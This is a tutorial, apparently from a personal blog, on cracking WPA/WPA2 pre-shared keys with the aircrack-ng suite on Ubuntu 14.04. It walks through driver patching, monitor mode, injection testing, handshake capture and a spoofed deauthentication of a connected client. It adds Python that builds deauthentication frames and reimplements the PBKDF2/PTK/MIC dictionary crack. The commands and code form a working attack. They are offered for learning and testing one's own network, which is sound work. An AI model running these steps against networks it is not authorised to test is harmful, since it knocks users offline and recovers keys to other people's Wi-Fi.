
aircrack-ng (rt2x00 mac80211 Linux wireless stack) in Ubuntu Trusty 14.04 LTS

Ubuntu is actually installed in a VirtualBox virtual machine on Mac OS X Yosemite 10.10.2. The USB Wi-Fi adapter has to be handed to the guest (for example with a VirtualBox USB device filter), because the VM's emulated network card cannot do monitor mode or packet injection. Before proceeding, read the important intro below from

Install aircrack-ng suite.

$ sudo apt-get install aircrack-ng

It should install and provide the following.

# dpkg -s aircrack-ng
Package: aircrack-ng
Status: install ok installed
Priority: optional
Section: net
Installed-Size: 2167
Maintainer: Ubuntu Developers
Architecture: amd64
Version: 1:1.1-6
Depends: libc6 (>= 2.15), libgcrypt11 (>= 1.4.5), libsqlite3-0 (>= 3.5.9), zlib1g (>= 1:1.1.4), wireless-tools, iw
Recommends: wget
Description: wireless WEP/WPA cracking utilities
 aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a
 40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets
 have been gathered. Also it can attack WPA1/2 networks with some advanced
 methods or simply by brute force.
 It implements the standard FMS attack along with some optimizations,
 thus making the attack much faster compared to other WEP cracking tools.
 It can also fully use a multiprocessor system to its full power in order
 to speed up the cracking process.
 aircrack-ng is a fork of aircrack, as that project has been stopped by
 the upstream maintainer.
Original-Maintainer: Carlos Alberto Lopez Perez

Tab completion on "air" lists the binaries the package provides:

# air<TAB><TAB>
airbase-ng              airdriver-ng            airodump-ng-oui-update
aircrack-ng             aireplay-ng             airolib-ng
airdecap-ng             airmon-ng               airserv-ng
airdecloak-ng           airodump-ng             airtun-ng

Patch the Wi-Fi card driver. Note that I am patching the mac80211 stack in Ubuntu 14.04 (14.04.1) by building the backports (compat-wireless) tree with the aircrack-ng injection patches applied, rather than the in-tree modules. mac80211 is the newer wireless stack of the Linux kernel: it has been in the kernel since 2.6.22, but drivers built on it were only included from 2.6.24. This is my kernel version.

# uname -a
Linux ubuntu 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:36:28 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

I have the Hawking HWUG1 USB Wi-fi with a supported chipset (Ralink rt73). See the compatibility list.

sudo apt-get update && sudo apt-get upgrade -y
sudo apt-get install linux-headers-$(uname -r) -y
cd /usr/src/
sudo wget
sudo tar xvfJ backports-3.17.1-1.tar.xz
cd backports-3.17.1-1
sudo apt-get install patch
sudo wget
sudo wget -Ocompatdrivers_chan_qos_frag.patch
sudo patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
sudo patch -p1  < compatdrivers_chan_qos_frag.patch
sudo make defconfig-wifi
sudo make
sudo make install
sudo update-initramfs -u

Mirror of --

Mirror of --

Plug the card in and this is my ifconfig.

# ifconfig wlan0
wlan0     Link encap:UNSPEC  HWaddr 00-XX-XX-XX-XX-XX-XX-XX-00-00-00-00-00-00-00-00
          RX packets:175924 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:12806243 (12.8 MB)  TX bytes:0 (0.0 B)

This is the USB Wi-fi device plugged in.

# lsusb | grep Ralink
Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

Put the card in monitor mode. (Notice I pass channel 11 so the monitor interface is locked to the channel of the AP I want to target.)

# airmon-ng start wlan0 11

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
731     dhclient

Interface       Chipset         Driver

wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Test that injection works from monitor mode. Replace the AP SSID, BSSID and monitor interface (mon0, the interface airmon-ng created above). A result of 30/30 means every directed probe was answered, so injection and reception both work.

# aireplay-ng --test -e AztechXXX -a 00:11:22:CA:A5:44 mon0
11:53:30  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
11:53:30  Trying broadcast probe requests...
11:53:30  Injection is working!
11:53:32  Found 1 AP

11:53:32  Trying directed probe requests...
11:53:32  00:11:22:CA:A5:44 - channel: 11 - 'AztechXXX'
11:53:33  Ping (min/avg/max): 4.545ms/19.723ms/45.179ms Power: -56.60
11:53:33  30/30: 100%

Start airodump-ng to capture the four-way authentication handshake. -w psk writes the capture to files prefixed psk (psk-01.cap and so on), which is what aircrack-ng is fed later. Replace the channel, BSSID and interface; use the monitor interface airmon-ng created (mon0 above), not the managed wlan0, or nothing will be captured. More hints here (READ THE IMPORTANT INTRO BELOW)

# airodump-ng --channel 11 --bssid 00:11:22:CA:A5:44 -w psk mon0

Here is what it looks like if a wireless client is connected to the network (illustrative output; the channel and addresses have been made consistent with the AP above):

  CH 11 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:11:22:CA:A5:44
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  00:11:22:CA:A5:44   39 100       51      116   14  11  54  WPA CCMP   PSK  AztechXXX
  BSSID              STATION            PWR  Lost  Packets  Probes
  00:11:22:CA:A5:44  00:0F:B5:FD:FB:C2   35     0      116

In the screen above, notice the "WPA handshake: 00:11:22:CA:A5:44" in the top right-hand corner. This means airodump-ng has seen EAPOL frames of the four-way handshake. The indicator can appear on a partial handshake, so before spending hours on a wordlist, point aircrack-ng at the capture file and confirm it reports a valid handshake for the BSSID.

Here it is with no connected wireless clients:

  CH 11 ][ Elapsed: 4 s ][ 2007-03-24 17:51
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  00:11:22:CA:A5:44   39 100       51        0    0  11  54  WPA CCMP   PSK  AztechXXX
  BSSID              STATION            PWR  Lost  Packets  Probes

Use aireplay-ng to deauthenticate the wireless client. More hints from

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you want to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is none, you have to wait for one to connect so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can come back and perform this step.

This step sends a deauthentication frame, spoofed from the AP, telling the wireless client that it is no longer associated. The client will then hopefully reauthenticate with the AP. That reauthentication is what generates the 4-way handshake we are interested in collecting, and the handshake is what we use to attack the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following.

-0 1 sends one burst of deauthentication frames (64 directed frames, as the output shows). -c is the client. -a is the AP. Use the monitor interface (mon0 above).

# aireplay-ng -0 1 -a 00:11:22:CA:A5:44 -c 00:0F:B5:FD:FB:C2 mon0
16:05:49  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
16:05:50  Sending 64 directed DeAuth. STMAC: [00:0F:B5:FD:FB:C2] [ 0| 0 ACKs]

The bracketed counters are the acknowledgements received (from the client and from the AP). 0|0 means neither side acknowledged the injected frames, which is exactly the situation the troubleshooting tip below describes.

Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.
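The frame that aireplay-ng -0 puts on the air is small enough to build by hand, and the same parsing lets you do the defender's job of spotting the 64-frame burst above in a monitor-mode capture. The block below is an added example, not code from the original post or from the aircrack-ng project: it constructs 802.11 deauthentication, beacon and ACK frames in memory (no radio involved), counts deauth streams per BSSID/source/target, and counts the ACKs addressed to the spoofed AP address, which is the check the troubleshooting tip above suggests doing with tcpdump. The reason code 7 (class 3 frame received from nonassociated STA) and the 314 us duration value are the example's own choices, not necessarily what aireplay-ng sends; the MAC addresses are the ones from the screens above.

```python
"""Build and detect 802.11 deauthentication frames (added example, constructed data)."""
import struct
from collections import Counter

MGMT, CTRL = 0, 1                 # 802.11 frame types
DEAUTH, BEACON, ACK = 12, 8, 13   # subtypes (management, management, control)

AP = bytes.fromhex("001122caa544")        # BSSID from the airodump-ng screen
CLIENT = bytes.fromhex("000fb5fdfbc2")    # associated station from the same screen
BROADCAST = b"\xff" * 6


def mac_str(mac: bytes) -> str:
    return ":".join(f"{b:02x}" for b in mac)


def frame_control(ftype: int, subtype: int) -> bytes:
    # little-endian: bits 0-1 protocol version, 2-3 type, 4-7 subtype
    return struct.pack("<H", (ftype << 2) | (subtype << 4))


def build_deauth(dst: bytes, src: bytes, bssid: bytes, seq: int, reason: int = 7) -> bytes:
    """Deauth = 24-byte management header + 2-byte reason code; src is spoofed as the AP."""
    return (frame_control(MGMT, DEAUTH) + struct.pack("<H", 314)
            + dst + src + bssid + struct.pack("<H", (seq & 0xFFF) << 4)
            + struct.pack("<H", reason))


def build_beacon(bssid: bytes, seq: int) -> bytes:
    """Minimal beacon: header, then 8-byte timestamp, interval and capabilities (zeroed)."""
    return (frame_control(MGMT, BEACON) + b"\x00\x00" + BROADCAST + bssid + bssid
            + struct.pack("<H", (seq & 0xFFF) << 4) + b"\x00" * 12)


def build_ack(receiver: bytes) -> bytes:
    """ACK is a 10-byte control frame carrying only the receiver address."""
    return frame_control(CTRL, ACK) + b"\x00\x00" + receiver


def frame_type(frame: bytes):
    fc = struct.unpack("<H", frame[:2])[0]
    return (fc >> 2) & 0x3, (fc >> 4) & 0xF


def is_deauth(frame: bytes) -> bool:
    return len(frame) >= 26 and frame_type(frame) == (MGMT, DEAUTH)


def is_ack(frame: bytes) -> bool:
    return len(frame) >= 10 and frame_type(frame) == (CTRL, ACK)


def deauth_reason(frame: bytes) -> int:
    return struct.unpack("<H", frame[24:26])[0]


def detect_deauth_bursts(frames, threshold: int = 16) -> dict:
    """Return {(bssid, source, target): count} for deauth streams at or above threshold."""
    counts = Counter()
    for f in frames:
        if is_deauth(f):
            dst, src, bssid = f[4:10], f[10:16], f[16:22]
            counts[(mac_str(bssid), mac_str(src), mac_str(dst))] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


def count_acks_to(frames, receiver: bytes) -> int:
    """ACKs whose receiver address is the (spoofed) source of the injected frames."""
    return sum(1 for f in frames if is_ack(f) and f[4:10] == receiver)


def constructed_capture():
    """Constructed sample: a 64-frame directed deauth burst like aireplay-ng -0 1,
    beacons interleaved, and the client acknowledging only the first 30 frames."""
    frames = []
    for i in range(64):
        if i % 8 == 0:
            frames.append(build_beacon(AP, seq=1000 + i))
        frames.append(build_deauth(CLIENT, AP, AP, seq=i))
        if i < 30:
            frames.append(build_ack(AP))
    return frames


def demo():
    frames = constructed_capture()
    return detect_deauth_bursts(frames), count_acks_to(frames, AP)


if __name__ == "__main__":
    bursts, acks = demo()
    print("deauth bursts:", bursts)
    print("ACKs addressed to the spoofed AP:", acks)
```

A capture from the real card would be read from the psk-01.cap written by airodump-ng (pcap records carry a radiotap header in front of the 802.11 frame, which has to be skipped before these parsers apply); the detection logic stays the same.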

To crack the PSK follow Step 4 in
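What that cracking step actually computes, and why the intro quoted below insists the passphrase must be in the wordlist, is shown by the added example that follows. It is not code from the original post or from aircrack-ng, but it reproduces the WPA2-PSK arithmetic aircrack-ng performs for every candidate: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), PTK = PRF-512(PMK, "Pairwise key expansion", MACs and nonces), and MIC = HMAC-SHA1(KCK, EAPOL-Key message 2) truncated to 16 bytes (key descriptor version 2, the one used with CCMP as airodump-ng reports above). The SSID and MAC addresses come from the screens above; the nonces, the EAPOL message 2 bytes, the "real" passphrase and the wordlist are constructed for the example, and message 2 omits the RSN IE a real client sends. The first assertion checks the derivation against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE").

```python
"""WPA2-PSK four-way-handshake dictionary attack, reduced to its arithmetic (added example)."""
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP). Key data (RSN IE) omitted."""
    body = (b"\x02"                          # descriptor type: RSN
            + b"\x01\x0a"                    # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + b"\x00\x00"                    # key length
            + replay_counter.to_bytes(8, "big")
            + snonce                         # key nonce = SNonce
            + b"\x00" * 16                   # key IV
            + b"\x00" * 8                    # key RSC
            + b"\x00" * 8                    # key ID
            + mic                            # key MIC (zero while computing the MIC)
            + b"\x00\x00")                   # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the EAPOL frame with its MIC field zeroed (descriptor version 2)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


# Constructed "capture": in a real run these values are read from psk-01.cap.
SSID = "AztechXXX"
AP_MAC = bytes.fromhex("001122caa544")
STA_MAC = bytes.fromhex("000fb5fdfbc2")
ANONCE = bytes(range(32))          # constructed nonces (real ones are random)
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "sunshine99"     # the (assumed) network key we are recovering


def simulate_capture(passphrase: str = REAL_PASSPHRASE) -> bytes:
    """Produce message 2 as the legitimate client would have sent it."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, mic=eapol_mic(kck, build_eapol_msg2(SNONCE)))


def demo(wordlist=("password", "letmein1", "sunshine99", "qwerty123")):
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, simulate_capture(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each candidate costs one PBKDF2 run of 4096 HMAC-SHA1 iterations, which is why the wiki intro talks about a few hundred keys per second on a CPU and why nothing in the handshake can shortcut a passphrase that is not in the list. The equivalent aircrack-ng invocation on the capture written by -w psk above is aircrack-ng -w wordlist.txt -b 00:11:22:CA:A5:44 psk*.cap.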

Intro from


This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial. 
WPA/WPA2 supports many types of authentication beyond pre-shared keys.  aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs, as when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.
The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.
IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.


mapawo said…
Let us report this to DTI. I WILL DO IT TOMORROW.

Anonymous said…
@mapawo maybe you made this comment in the wrong article?
